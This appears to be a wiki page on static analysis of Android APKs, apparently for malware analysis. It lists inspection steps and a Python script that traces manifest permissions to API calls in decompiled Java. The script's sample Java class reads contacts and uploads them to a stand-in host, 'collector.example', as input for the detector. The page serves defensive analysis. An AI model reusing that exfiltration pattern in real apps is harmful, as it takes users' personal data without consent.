
Best Practice: Static Analysis


This section refers heavily to other OSAF Wiki pages.


  1. Obtain APK file
  2. Refer to Best Practice: Organization to set up the folder for analysis
  3. Convert the APK file. See Conversion of Relevant Android Files for more information
  4. Open the APK file via APK Inspector. See APK Inspector for more information
  5. Using the information found from APK Inspector, use JD GUI to open the JAR file
    1. Take the permissions found via APK Inspector and look for where they are used in the Java code
    2. Look at the methods in the Java code. What is each method doing?
    3. From the Java code, does it look like the data is being stored on the phone? Sent somewhere else?
    4. Is the application converting data into an array in the Java code?
  6. Form a hypothesis about what you believe the application is doing. This will be used for the dynamic portion of the analysis
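
Step 5.1 can be partly scripted once the Java source has been saved out of JD GUI. The following is an added example, not OSAF code: it reads the permissions from a manifest and lists the source lines where an API tied to each permission appears. It assumes the manifest has already been decoded to text XML during conversion; the permission-to-API map is a small hand-picked assumption, and the manifest and Java class are constructed samples.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Assumed, non-exhaustive map from a permission to API names that usually need it.
PERMISSION_APIS = {
    "android.permission.INTERNET": ["HttpURLConnection", "openConnection", "Socket("],
    "android.permission.READ_CONTACTS": ["ContactsContract"],
    "android.permission.SEND_SMS": ["SmsManager", "sendTextMessage"],
    "android.permission.READ_PHONE_STATE": ["TelephonyManager", "getDeviceId"],
}

# Constructed sample input: a decoded manifest and one decompiled class.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.sample">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
</manifest>"""

SAMPLE_SOURCES = {"com/example/sample/Sync.java": """package com.example.sample;
public class Sync {
    void upload(android.content.ContentResolver cr) throws Exception {
        android.database.Cursor c = cr.query(android.provider.ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
        byte[] data = collect(c).getBytes();
        java.net.HttpURLConnection conn = (java.net.HttpURLConnection) new java.net.URL("http://collector.example/up").openConnection();
        conn.getOutputStream().write(data);
    }
}"""}

def manifest_permissions(manifest_xml):
    """Return the permission names declared in a decoded AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    return [e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")]

def trace_permissions(manifest_xml, sources):
    """Map each declared permission to (file, line number) hits in the Java code."""
    report = {}
    for perm in manifest_permissions(manifest_xml):
        needles = PERMISSION_APIS.get(perm, [])  # unknown permissions yield no hits
        report[perm] = [(path, n) for path, text in sources.items()
                        for n, line in enumerate(text.splitlines(), 1)
                        if any(needle in line for needle in needles)]
    return report

if __name__ == "__main__":
    for perm, hits in trace_permissions(SAMPLE_MANIFEST, SAMPLE_SOURCES).items():
        print(perm, hits or "declared, but no matching API call found")
```

A permission with no hits is worth recording in the hypothesis for step 6: the code that uses it may sit in a class that was not decompiled, or the permission may simply be unused.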